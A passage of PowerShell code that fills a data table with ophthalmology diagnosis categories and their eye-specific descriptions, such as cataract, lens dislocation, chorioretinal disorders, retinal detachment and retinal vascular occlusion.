$DiagnosisList.Rows.Add("Soemmering's ring","Soemmering's ring, left eye") + $null = $DiagnosisList.Rows.Add("Soemmering's ring","Soemmering's ring, bilateral") + $null = $DiagnosisList.Rows.Add("Soemmering's ring","Soemmering's ring, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other secondary cataract","Other secondary cataract, right eye") + $null = $DiagnosisList.Rows.Add("Other secondary cataract","Other secondary cataract, left eye") + $null = $DiagnosisList.Rows.Add("Other secondary cataract","Other secondary cataract, bilateral") + $null = $DiagnosisList.Rows.Add("Other secondary cataract","Other secondary cataract, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other specified cataract","Other specified cataract") + $null = $DiagnosisList.Rows.Add("Unspecified cataract","Unspecified cataract") + $null = $DiagnosisList.Rows.Add("Aphakia","Aphakia, unspecified eye") + $null = $DiagnosisList.Rows.Add("Aphakia","Aphakia, right eye") + $null = $DiagnosisList.Rows.Add("Aphakia","Aphakia, left eye") + $null = $DiagnosisList.Rows.Add("Aphakia","Aphakia, bilateral") + $null = $DiagnosisList.Rows.Add("Dislocation of lens","Unspecified dislocation of lens") + $null = $DiagnosisList.Rows.Add("Subluxation of lens","Subluxation of lens, right eye") + $null = $DiagnosisList.Rows.Add("Subluxation of lens","Subluxation of lens, left eye") + $null = $DiagnosisList.Rows.Add("Subluxation of lens","Subluxation of lens, bilateral") + $null = $DiagnosisList.Rows.Add("Subluxation of lens","Subluxation of lens, unspecified eye") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of lens","Anterior dislocation of lens, right eye") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of lens","Anterior dislocation of lens, left eye") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of lens","Anterior dislocation of lens, bilateral") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of lens","Anterior dislocation of lens, unspecified eye") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of lens","Posterior dislocation of lens, right eye") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of lens","Posterior dislocation of lens, left eye") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of lens","Posterior dislocation of lens, bilateral") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of lens","Posterior dislocation of lens, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other specified disorders of lens","Other specified disorders of lens") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of lens","Unspecified disorder of lens") + $null = $DiagnosisList.Rows.Add("Cataract in diseases classified elsewhere","Cataract in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Unspecified focal chorioretinal inflammation","Unspecified focal chorioretinal inflammation, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified focal chorioretinal inflammation","Unspecified focal chorioretinal inflammation, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified focal chorioretinal inflammation","Unspecified focal chorioretinal inflammation, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified focal chorioretinal inflammation","Unspecified focal chorioretinal inflammation, unspecified eye") + $null = $DiagnosisList.Rows.Add("Focal chorioretinal inflammation, juxtapapillary","Focal chorioretinal inflammation, juxtapapillary, right eye") + $null = $DiagnosisList.Rows.Add("Focal chorioretinal inflammation, juxtapapillary","Focal chorioretinal inflammation, juxtapapillary, left eye") + $null = $DiagnosisList.Rows.Add("Focal chorioretinal inflammation, juxtapapillary","Focal chorioretinal inflammation, juxtapapillary, bilateral") + $null = $DiagnosisList.Rows.Add("Focal chorioretinal inflammation, juxtapapillary","Focal chorioretinal inflammation, juxtapapillary, unspecified eye") + $null = $DiagnosisList.Rows.Add("Focal chorioretinal inflammation of posterior pole","Focal chorioretinal inflammation of posterior pole, right eye") + $null = $DiagnosisList.Rows.Add("Focal chorioretinal inflammation of posterior pole","Focal chorioretinal inflammation of posterior pole, left eye") + $null = $DiagnosisList.Rows.Add("Focal chorioretinal inflammation of posterior pole","Focal chorioretinal inflammation of posterior pole, bilateral") + $null = $DiagnosisList.Rows.Add("Focal chorioretinal inflammation of posterior pole","Focal chorioretinal inflammation of posterior pole, unspecified eye") + $null = $DiagnosisList.Rows.Add("Focal chorioretinal inflammation, peripheral","Focal chorioretinal inflammation, peripheral, right eye") + $null = $DiagnosisList.Rows.Add("Focal chorioretinal inflammation, peripheral","Focal chorioretinal inflammation, peripheral, left eye") + $null = $DiagnosisList.Rows.Add("Focal chorioretinal inflammation, peripheral","Focal chorioretinal inflammation, peripheral, bilateral") + $null = $DiagnosisList.Rows.Add("Focal chorioretinal inflammation, peripheral","Focal chorioretinal inflammation, peripheral, unspecified eye") + $null = $DiagnosisList.Rows.Add("Focal chorioretinal inflammation, macular or paramacular","Focal chorioretinal inflammation, macular or paramacular, right eye") + $null = $DiagnosisList.Rows.Add("Focal chorioretinal inflammation, macular or paramacular","Focal chorioretinal inflammation, macular or paramacular, left eye") + $null = $DiagnosisList.Rows.Add("Focal chorioretinal inflammation, macular or paramacular","Focal chorioretinal inflammation, macular or paramacular, bilateral") + $null = $DiagnosisList.Rows.Add("Focal chorioretinal inflammation, macular or paramacular","Focal chorioretinal inflammation, macular or paramacular, unspecified eye") + $null = $DiagnosisList.Rows.Add("Unspecified disseminated chorioretinal inflammation","Unspecified disseminated chorioretinal inflammation, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified disseminated chorioretinal inflammation","Unspecified disseminated chorioretinal inflammation, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified disseminated chorioretinal inflammation","Unspecified disseminated chorioretinal inflammation, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified disseminated chorioretinal inflammation","Unspecified disseminated chorioretinal inflammation, unspecified eye") + $null = $DiagnosisList.Rows.Add("Disseminated chorioretinal inflammation of posterior pole","Disseminated chorioretinal inflammation of posterior pole, right eye") + $null = $DiagnosisList.Rows.Add("Disseminated chorioretinal inflammation of posterior pole","Disseminated chorioretinal inflammation of posterior pole, left eye") + $null = $DiagnosisList.Rows.Add("Disseminated chorioretinal inflammation of posterior pole","Disseminated chorioretinal inflammation of posterior pole, bilateral") + $null = $DiagnosisList.Rows.Add("Disseminated chorioretinal inflammation of posterior pole","Disseminated chorioretinal inflammation of posterior pole, unspecified eye") + $null = $DiagnosisList.Rows.Add("Disseminated chorioretinal inflammation, peripheral","Disseminated chorioretinal inflammation, peripheral right eye") + $null = $DiagnosisList.Rows.Add("Disseminated chorioretinal inflammation, peripheral","Disseminated chorioretinal inflammation, peripheral, left eye") + $null = $DiagnosisList.Rows.Add("Disseminated chorioretinal inflammation, peripheral","Disseminated chorioretinal inflammation, peripheral, bilateral") + $null = $DiagnosisList.Rows.Add("Disseminated chorioretinal inflammation, peripheral","Disseminated chorioretinal inflammation, peripheral, unspecified eye") + $null = $DiagnosisList.Rows.Add("Disseminated chorioretinal inflammation, generalized","Disseminated chorioretinal inflammation, generalized, right eye") + $null = $DiagnosisList.Rows.Add("Disseminated chorioretinal inflammation, generalized","Disseminated chorioretinal inflammation, generalized, left eye") + $null = $DiagnosisList.Rows.Add("Disseminated chorioretinal inflammation, generalized","Disseminated chorioretinal inflammation, generalized, bilateral") + $null = $DiagnosisList.Rows.Add("Disseminated chorioretinal inflammation, generalized","Disseminated chorioretinal inflammation, generalized, unspecified eye") + $null = $DiagnosisList.Rows.Add("Acute posterior multifocal placoid pigment epitheliopathy","Acute posterior multifocal placoid pigment epitheliopathy, right eye") + $null = $DiagnosisList.Rows.Add("Acute posterior multifocal placoid pigment epitheliopathy","Acute posterior multifocal placoid pigment epitheliopathy, left eye") + $null = $DiagnosisList.Rows.Add("Acute posterior multifocal placoid pigment epitheliopathy","Acute posterior multifocal placoid pigment epitheliopathy, bilateral") + $null = $DiagnosisList.Rows.Add("Acute posterior multifocal placoid pigment epitheliopathy","Acute posterior multifocal placoid pigment epitheliopathy, unspecified eye") + $null = $DiagnosisList.Rows.Add("Posterior cyclitis","Posterior cyclitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Posterior cyclitis","Posterior cyclitis, right eye") + $null = $DiagnosisList.Rows.Add("Posterior cyclitis","Posterior cyclitis, left eye") + $null = $DiagnosisList.Rows.Add("Posterior cyclitis","Posterior cyclitis, bilateral") + $null = $DiagnosisList.Rows.Add("Harada's disease","Harada's disease, right eye") + $null = $DiagnosisList.Rows.Add("Harada's disease","Harada's disease, left eye") + $null = $DiagnosisList.Rows.Add("Harada's disease","Harada's disease, bilateral") + $null = $DiagnosisList.Rows.Add("Harada's disease","Harada's disease, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other chorioretinal inflammations","Other chorioretinal inflammations, right eye") + $null = $DiagnosisList.Rows.Add("Other chorioretinal inflammations","Other chorioretinal inflammations, left eye") + $null = $DiagnosisList.Rows.Add("Other chorioretinal inflammations","Other chorioretinal inflammations, bilateral") + $null = $DiagnosisList.Rows.Add("Other chorioretinal inflammations","Other chorioretinal inflammations, unspecified eye") + $null = $DiagnosisList.Rows.Add("Unspecified chorioretinal inflammation","Unspecified chorioretinal inflammation, unspecified eye") + $null = $DiagnosisList.Rows.Add("Unspecified chorioretinal inflammation","Unspecified chorioretinal inflammation, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified chorioretinal inflammation","Unspecified chorioretinal inflammation, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified chorioretinal inflammation","Unspecified chorioretinal inflammation, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified chorioretinal scars","Unspecified chorioretinal scars, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified chorioretinal scars","Unspecified chorioretinal scars, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified chorioretinal scars","Unspecified chorioretinal scars, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified chorioretinal scars","Unspecified chorioretinal scars, unspecified eye") + $null = $DiagnosisList.Rows.Add("Macula scars of posterior pole (postinflammatory) (post-traumatic)","Macula scars of posterior pole (postinflammatory) (post-traumatic), right eye") + $null = $DiagnosisList.Rows.Add("Macula scars of posterior pole (postinflammatory) (post-traumatic)","Macula scars of posterior pole (postinflammatory) (post-traumatic), left eye") + $null = $DiagnosisList.Rows.Add("Macula scars of posterior pole (postinflammatory) (post-traumatic)","Macula scars of posterior pole (postinflammatory) (post-traumatic), bilateral") + $null = $DiagnosisList.Rows.Add("Macula scars of posterior pole (postinflammatory) (post-traumatic)","Macula scars of posterior pole (postinflammatory) (post-traumatic), unspecified eye") + $null = $DiagnosisList.Rows.Add("Solar retinopathy","Solar retinopathy, right eye") + $null = $DiagnosisList.Rows.Add("Solar retinopathy","Solar retinopathy, left eye") + $null = $DiagnosisList.Rows.Add("Solar retinopathy","Solar retinopathy, bilateral") + $null = $DiagnosisList.Rows.Add("Solar retinopathy","Solar retinopathy, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other chorioretinal scars","Other chorioretinal scars, right eye") + $null = $DiagnosisList.Rows.Add("Other chorioretinal scars","Other chorioretinal scars, left eye") + $null = $DiagnosisList.Rows.Add("Other chorioretinal scars","Other chorioretinal scars, bilateral") + $null = $DiagnosisList.Rows.Add("Other chorioretinal scars","Other chorioretinal scars, unspecified eye") + $null = $DiagnosisList.Rows.Add("Unspecified choroidal degeneration","Choroidal degeneration, unspecified, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified choroidal degeneration","Choroidal degeneration, unspecified, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified choroidal degeneration","Choroidal degeneration, unspecified, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified choroidal degeneration","Choroidal degeneration, unspecified, unspecified eye") + $null = $DiagnosisList.Rows.Add("Age-related choroidal atrophy","Age-related choroidal atrophy, right eye") + $null = $DiagnosisList.Rows.Add("Age-related choroidal atrophy","Age-related choroidal atrophy, left eye") + $null = $DiagnosisList.Rows.Add("Age-related choroidal atrophy","Age-related choroidal atrophy, bilateral") + $null = $DiagnosisList.Rows.Add("Age-related choroidal atrophy","Age-related choroidal atrophy, unspecified eye") + $null = $DiagnosisList.Rows.Add("Diffuse secondary atrophy of choroid","Diffuse secondary atrophy of choroid, right eye") + $null = $DiagnosisList.Rows.Add("Diffuse secondary atrophy of choroid","Diffuse secondary atrophy of choroid, left eye") + $null = $DiagnosisList.Rows.Add("Diffuse secondary atrophy of choroid","Diffuse secondary atrophy of choroid, bilateral") + $null = $DiagnosisList.Rows.Add("Diffuse secondary atrophy of choroid","Diffuse secondary atrophy of choroid, unspecified eye") + $null = $DiagnosisList.Rows.Add("Hereditary choroidal dystrophy","Hereditary choroidal dystrophy, unspecified") + $null = $DiagnosisList.Rows.Add("Hereditary choroidal dystrophy","Choroideremia") + $null = $DiagnosisList.Rows.Add("Hereditary choroidal dystrophy","Choroidal dystrophy (central areolar) (generalized) (peripapillary)") + $null = $DiagnosisList.Rows.Add("Hereditary choroidal dystrophy","Gyrate atrophy, choroid") + $null = $DiagnosisList.Rows.Add("Hereditary choroidal dystrophy","Other hereditary choroidal dystrophy") + $null = $DiagnosisList.Rows.Add("Unspecified choroidal hemorrhage","Unspecified choroidal hemorrhage, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified choroidal hemorrhage","Unspecified choroidal hemorrhage, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified choroidal hemorrhage","Unspecified choroidal hemorrhage, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified choroidal hemorrhage","Unspecified choroidal hemorrhage, unspecified eye") + $null = $DiagnosisList.Rows.Add("Expulsive choroidal hemorrhage","Expulsive choroidal hemorrhage, right eye") + $null = $DiagnosisList.Rows.Add("Expulsive choroidal hemorrhage","Expulsive choroidal hemorrhage, left eye") + $null = $DiagnosisList.Rows.Add("Expulsive choroidal hemorrhage","Expulsive choroidal hemorrhage, bilateral") + $null = $DiagnosisList.Rows.Add("Expulsive choroidal hemorrhage","Expulsive choroidal hemorrhage, unspecified eye") + $null = $DiagnosisList.Rows.Add("Choroidal rupture","Choroidal rupture, right eye") + $null = $DiagnosisList.Rows.Add("Choroidal rupture","Choroidal rupture, left eye") + $null = $DiagnosisList.Rows.Add("Choroidal rupture","Choroidal rupture, bilateral") + $null = $DiagnosisList.Rows.Add("Choroidal rupture","Choroidal rupture, unspecified eye") + $null = $DiagnosisList.Rows.Add("Unspecified choroidal detachment","Unspecified choroidal detachment, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified choroidal detachment","Unspecified choroidal detachment, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified choroidal detachment","Unspecified choroidal detachment, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified choroidal detachment","Unspecified choroidal detachment, unspecified eye") + $null = $DiagnosisList.Rows.Add("Hemorrhagic choroidal detachment","Hemorrhagic choroidal detachment, right eye") + $null = $DiagnosisList.Rows.Add("Hemorrhagic choroidal detachment","Hemorrhagic choroidal detachment, left eye") + $null = $DiagnosisList.Rows.Add("Hemorrhagic choroidal detachment","Hemorrhagic choroidal detachment, bilateral") + $null = $DiagnosisList.Rows.Add("Hemorrhagic choroidal detachment","Hemorrhagic choroidal detachment, unspecified eye") + $null = $DiagnosisList.Rows.Add("Serous choroidal detachment","Serous choroidal detachment, right eye") + $null = $DiagnosisList.Rows.Add("Serous choroidal detachment","Serous choroidal detachment, left eye") + $null = $DiagnosisList.Rows.Add("Serous choroidal detachment","Serous choroidal detachment, bilateral") + $null = $DiagnosisList.Rows.Add("Serous choroidal detachment","Serous choroidal detachment, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other specified disorders of choroid","Other specified disorders of choroid") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of choroid","Unspecified disorder of choroid") + $null = $DiagnosisList.Rows.Add("Chorioretinal disorders in diseases classified elsewhere","Chorioretinal disorders in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Unspecified retinal detachment with retinal break","Unspecified retinal detachment with retinal break, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified retinal detachment with retinal break","Unspecified retinal detachment with retinal break, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified retinal detachment with retinal break","Unspecified retinal detachment with retinal break, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified retinal detachment with retinal break","Unspecified retinal detachment with retinal break, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retinal detachment with single break","Retinal detachment with single break, right eye") + $null = $DiagnosisList.Rows.Add("Retinal detachment with single break","Retinal detachment with single break, left eye") + $null = $DiagnosisList.Rows.Add("Retinal detachment with single break","Retinal detachment with single break, bilateral") + $null = $DiagnosisList.Rows.Add("Retinal detachment with single break","Retinal detachment with single break, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retinal detachment with multiple breaks","Retinal detachment with multiple breaks, right eye") + $null = $DiagnosisList.Rows.Add("Retinal detachment with multiple breaks","Retinal detachment with multiple breaks, left eye") + $null = $DiagnosisList.Rows.Add("Retinal detachment with multiple breaks","Retinal detachment with multiple breaks, bilateral") + $null = $DiagnosisList.Rows.Add("Retinal detachment with multiple breaks","Retinal detachment with multiple breaks, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retinal detachment with giant retinal tear","Retinal detachment with giant retinal tear, right eye") + $null = $DiagnosisList.Rows.Add("Retinal detachment with giant retinal tear","Retinal detachment with giant retinal tear, left eye") + $null = $DiagnosisList.Rows.Add("Retinal detachment with giant retinal tear","Retinal detachment with giant retinal tear, bilateral") + $null = $DiagnosisList.Rows.Add("Retinal detachment with giant retinal tear","Retinal detachment with giant retinal tear, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retinal detachment with retinal dialysis","Retinal detachment with retinal dialysis, right eye") + $null = $DiagnosisList.Rows.Add("Retinal detachment with retinal dialysis","Retinal detachment with retinal dialysis, left eye") + $null = $DiagnosisList.Rows.Add("Retinal detachment with retinal dialysis","Retinal detachment with retinal dialysis, bilateral") + $null = $DiagnosisList.Rows.Add("Retinal detachment with retinal dialysis","Retinal detachment with retinal dialysis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Total retinal detachment","Total retinal detachment, right eye") + $null = $DiagnosisList.Rows.Add("Total retinal detachment","Total retinal detachment, left eye") + $null = $DiagnosisList.Rows.Add("Total retinal detachment","Total retinal detachment, bilateral") + $null = $DiagnosisList.Rows.Add("Total retinal detachment","Total retinal detachment, unspecified eye") + $null = $DiagnosisList.Rows.Add("Unspecified retinoschisis","Unspecified retinoschisis, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified retinoschisis","Unspecified retinoschisis, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified retinoschisis","Unspecified retinoschisis, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified retinoschisis","Unspecified retinoschisis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Cyst of ora serrata","Cyst of ora serrata, right eye") + $null = $DiagnosisList.Rows.Add("Cyst of ora serrata","Cyst of ora serrata, left eye") + $null = $DiagnosisList.Rows.Add("Cyst of ora serrata","Cyst of ora serrata, bilateral") + $null = $DiagnosisList.Rows.Add("Cyst of ora serrata","Cyst of ora serrata, unspecified eye") + $null = $DiagnosisList.Rows.Add("Parasitic cyst of retina","Parasitic cyst of retina, right eye") + $null = $DiagnosisList.Rows.Add("Parasitic cyst of retina","Parasitic cyst of retina, left eye") + $null = $DiagnosisList.Rows.Add("Parasitic cyst of retina","Parasitic cyst of retina, bilateral") + $null = $DiagnosisList.Rows.Add("Parasitic cyst of retina","Parasitic cyst of retina, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other retinoschisis and retinal cysts","Other retinoschisis and retinal cysts, right eye") + $null = $DiagnosisList.Rows.Add("Other retinoschisis and retinal cysts","Other retinoschisis and retinal cysts, left eye") + $null = $DiagnosisList.Rows.Add("Other retinoschisis and retinal cysts","Other retinoschisis and retinal cysts, bilateral") + $null = $DiagnosisList.Rows.Add("Other retinoschisis and retinal cysts","Other retinoschisis and retinal cysts, unspecified eye") + $null = $DiagnosisList.Rows.Add("Serous retinal detachment","Serous retinal detachment, unspecified eye") + $null = $DiagnosisList.Rows.Add("Serous retinal detachment","Serous retinal detachment, right eye") + $null = $DiagnosisList.Rows.Add("Serous retinal detachment","Serous retinal detachment, left eye") + $null = $DiagnosisList.Rows.Add("Serous retinal detachment","Serous retinal detachment, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified retinal break","Unspecified retinal break, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified retinal break","Unspecified retinal break, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified retinal break","Unspecified retinal break, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified retinal break","Unspecified retinal break, unspecified eye") + $null = $DiagnosisList.Rows.Add("Horseshoe tear of retina without detachment","Horseshoe tear of retina without detachment, right eye") + $null = $DiagnosisList.Rows.Add("Horseshoe tear of retina without detachment","Horseshoe tear of retina without detachment, left eye") + $null = $DiagnosisList.Rows.Add("Horseshoe tear of retina without detachment","Horseshoe tear of retina without detachment, bilateral") + $null = $DiagnosisList.Rows.Add("Horseshoe tear of retina without detachment","Horseshoe tear of retina without detachment, unspecified eye") + $null = $DiagnosisList.Rows.Add("Round hole of retina without detachment","Round hole, right eye") + $null = $DiagnosisList.Rows.Add("Round hole of retina without detachment","Round hole, left eye") + $null = $DiagnosisList.Rows.Add("Round hole of retina without detachment","Round hole, bilateral") + $null = $DiagnosisList.Rows.Add("Round hole of retina without detachment","Round hole, unspecified eye") + $null = $DiagnosisList.Rows.Add("Multiple defects of retina without detachment","Multiple defects of retina without detachment, right eye") + $null = $DiagnosisList.Rows.Add("Multiple defects of retina without detachment","Multiple defects of retina without detachment, left eye") + $null = $DiagnosisList.Rows.Add("Multiple defects of retina without detachment","Multiple defects of retina without detachment, bilateral") + $null = $DiagnosisList.Rows.Add("Multiple defects of retina without detachment","Multiple defects of retina without detachment, unspecified eye") + $null = $DiagnosisList.Rows.Add("Traction detachment of retina","Traction detachment of retina, unspecified eye") + $null = $DiagnosisList.Rows.Add("Traction detachment of retina","Traction detachment of retina, right eye") + $null = $DiagnosisList.Rows.Add("Traction detachment of retina","Traction detachment of retina, left eye") + $null = $DiagnosisList.Rows.Add("Traction detachment of retina","Traction detachment of retina, bilateral") + $null = $DiagnosisList.Rows.Add("Other retinal detachments","Other retinal detachments") + $null = $DiagnosisList.Rows.Add("Transient retinal artery occlusion","Transient retinal artery occlusion, unspecified eye") + $null = $DiagnosisList.Rows.Add("Transient retinal artery occlusion","Transient retinal artery occlusion, right eye") + $null = $DiagnosisList.Rows.Add("Transient retinal artery occlusion","Transient retinal artery occlusion, left eye") + $null = $DiagnosisList.Rows.Add("Transient retinal artery occlusion","Transient retinal artery occlusion, bilateral") + $null = $DiagnosisList.Rows.Add("Central retinal artery occlusion","Central retinal artery occlusion, unspecified eye") + $null = $DiagnosisList.Rows.Add("Central retinal artery occlusion","Central retinal artery occlusion, right eye") + $null = $DiagnosisList.Rows.Add("Central retinal artery occlusion","Central retinal artery occlusion, left eye") + $null = $DiagnosisList.Rows.Add("Central retinal artery occlusion","Central retinal artery occlusion, bilateral") + $null = $DiagnosisList.Rows.Add("Partial retinal artery occlusion","Partial retinal artery occlusion, right eye") + $null = $DiagnosisList.Rows.Add("Partial retinal artery occlusion","Partial retinal artery occlusion, left eye") + $null = $DiagnosisList.Rows.Add("Partial retinal artery occlusion","Partial retinal artery occlusion, bilateral") + $null = $DiagnosisList.Rows.Add("Partial retinal artery occlusion","Partial retinal artery occlusion, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retinal artery branch occlusion","Retinal artery branch occlusion, right eye") + $null = $DiagnosisList.Rows.Add("Retinal artery branch occlusion","Retinal artery branch occlusion, left eye") + $null = $DiagnosisList.Rows.Add("Retinal artery branch occlusion","Retinal artery branch occlusion, bilateral") + $null = $DiagnosisList.Rows.Add("Retinal artery branch occlusion","Retinal artery branch occlusion, unspecified eye") + $null = $DiagnosisList.Rows.Add("Central retinal vein occlusion, right eye","Central retinal vein occlusion, right eye, with macular edema") + $null = $DiagnosisList.Rows.Add("Central retinal vein occlusion, right eye","Central retinal vein occlusion, right eye, with retinal neovascularization") + $null = $DiagnosisList.Rows.Add("Central retinal vein occlusion, right eye","Central retinal vein occlusion, right eye, stable") + $null = $DiagnosisList.Rows.Add("Central retinal vein occlusion, left eye","Central retinal vein occlusion, left eye, with macular edema") + $null = $DiagnosisList.Rows.Add("Central retinal vein occlusion, left eye","Central retinal vein occlusion, left eye, with retinal neovascularization") + $null = $DiagnosisList.Rows.Add("Central retinal vein occlusion, left eye","Central retinal vein occlusion, left eye, stable") + $null = $DiagnosisList.Rows.Add("Central retinal vein occlusion, bilateral","Central retinal vein occlusion, bilateral, with macular edema") + $null = $DiagnosisList.Rows.Add("Central retinal vein occlusion, bilateral","Central retinal vein occlusion, bilateral, with retinal neovascularization") + $null = $DiagnosisList.Rows.Add("Central retinal vein occlusion, bilateral","Central retinal vein occlusion, bilateral, stable") + $null = $DiagnosisList.Rows.Add("Central retinal vein occlusion, unspecified eye","Central retinal vein occlusion, unspecified eye, with macular edema") + $null = $DiagnosisList.Rows.Add("Central retinal vein occlusion, unspecified eye","Central retinal vein occlusion, unspecified eye, with retinal neovascularization") + $null = $DiagnosisList.Rows.Add("Central retinal vein occlusion, unspecified eye","Central retinal vein occlusion, unspecified eye, stable") + $null = $DiagnosisList.Rows.Add("Venous engorgement","Venous engorgement, right eye") + $null = $DiagnosisList.Rows.Add("Venous engorgement","Venous engorgement, left eye") + $null = $DiagnosisList.Rows.Add("Venous engorgement","Venous engorgement, bilateral") + $null = $DiagnosisList.Rows.Add("Venous engorgement","Venous engorgement, unspecified eye") + $null = $DiagnosisList.Rows.Add("Tributary (branch) retinal vein occlusion, right eye","Tributary (branch) retinal vein occlusion, right eye, with macular edema") + $null = $DiagnosisList.Rows.Add("Tributary (branch) retinal vein occlusion, right eye","Tributary (branch) retinal vein occlusion, right eye, with retinal neovascularization") + $null = $DiagnosisList.Rows.Add("Tributary (branch) retinal vein occlusion, right eye","Tributary (branch) retinal vein occlusion, right eye, stable") + $null = $DiagnosisList.Rows.Add("Tributary (branch) retinal vein occlusion, left eye","Tributary (branch) retinal vein occlusion, left eye, with macular edema") + $null = $DiagnosisList.Rows.Add("Tributary (branch) retinal vein occlusion, left eye","Tributary (branch) retinal vein occlusion, left eye, with retinal neovascularization") + $null = $DiagnosisList.Rows.Add("Tributary (branch) retinal vein occlusion, left eye","Tributary (branch) retinal vein occlusion, left eye, stable") + $null = $DiagnosisList.Rows.Add("Tributary (branch) retinal vein occlusion, bilateral","Tributary (branch) retinal vein occlusion, bilateral, with macular edema") + $null = $DiagnosisList.Rows.Add("Tributary (branch) retinal vein occlusion, bilateral","Tributary (branch) retinal vein occlusion, bilateral, with retinal neovascularization") + $null = $DiagnosisList.Rows.Add("Tributary (branch) retinal vein occlusion, bilateral","Tributary (branch) retinal vein occlusion, bilateral, stable") + $null = $DiagnosisList.Rows.Add("Tributary (branch) retinal vein occlusion, unspecified eye","Tributary (branch) retinal vein occlusion, unspecified eye, with macular edema") + $null = $DiagnosisList.Rows.Add("Tributary (branch) retinal vein occlusion, unspecified eye","Tributary (branch) retinal vein occlusion, unspecified eye, with retinal neovascularization") + $null = $DiagnosisList.Rows.Add("Tributary (branch) retinal vein occlusion, unspecified eye","Tributary (branch) retinal vein occlusion, unspecified eye, stable") + $null = $DiagnosisList.Rows.Add("Unspecified retinal vascular occlusion","Unspecified retinal vascular occlusion") + $null = $DiagnosisList.Rows.Add("Background retinopathy and retinal vascular changes","Unspecified background retinopathy") + $null = $DiagnosisList.Rows.Add("Changes in retinal vascular appearance","Changes in retinal vascular appearance, right eye") + $null = $DiagnosisList.Rows.Add("Changes in retinal vascular appearance","Changes in retinal vascular appearance, left eye") + $null = $DiagnosisList.Rows.Add("Changes in retinal vascular appearance","Changes in retinal vascular appearance, bilateral") + $null = $DiagnosisList.Rows.Add("Changes in retinal vascular appearance","Changes in retinal vascular appearance, unspecified eye") + $null = $DiagnosisList.Rows.Add("Exudative retinopathy","Exudative retinopathy, right eye") + $null = $DiagnosisList.Rows.Add("Exudative retinopathy","Exudative retinopathy, left eye") + $null = $DiagnosisList.Rows.Add("Exudative retinopathy","Exudative retinopathy, bilateral") + $null = $DiagnosisList.Rows.Add("Exudative retinopathy","Exudative retinopathy, unspecified eye") + $null = $DiagnosisList.Rows.Add("Hypertensive retinopathy","Hypertensive retinopathy, right eye") + $null = $DiagnosisList.Rows.Add("Hypertensive retinopathy","Hypertensive retinopathy, left eye") + $null = $DiagnosisList.Rows.Add("Hypertensive retinopathy","Hypertensive retinopathy, bilateral") + $null = $DiagnosisList.Rows.Add("Hypertensive retinopathy","Hypertensive retinopathy, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retinal micro-aneurysms, unspecified","Retinal micro-aneurysms, unspecified, right eye") + $null = $DiagnosisList.Rows.Add("Retinal micro-aneurysms, unspecified","Retinal micro-aneurysms, unspecified, left eye") + $null = $DiagnosisList.Rows.Add("Retinal micro-aneurysms, unspecified","Retinal micro-aneurysms, unspecified, bilateral") + $null = $DiagnosisList.Rows.Add("Retinal micro-aneurysms, unspecified","Retinal micro-aneurysms, unspecified, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retinal neovascularization, unspecified","Retinal neovascularization, unspecified, right eye") + $null = $DiagnosisList.Rows.Add("Retinal neovascularization, unspecified","Retinal neovascularization, unspecified, left eye") + $null = $DiagnosisList.Rows.Add("Retinal neovascularization, unspecified","Retinal neovascularization, unspecified, bilateral") + $null = $DiagnosisList.Rows.Add("Retinal neovascularization, unspecified","Retinal neovascularization, unspecified, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retinal vasculitis","Retinal vasculitis, right eye") + $null = $DiagnosisList.Rows.Add("Retinal vasculitis","Retinal vasculitis, left eye") + $null = 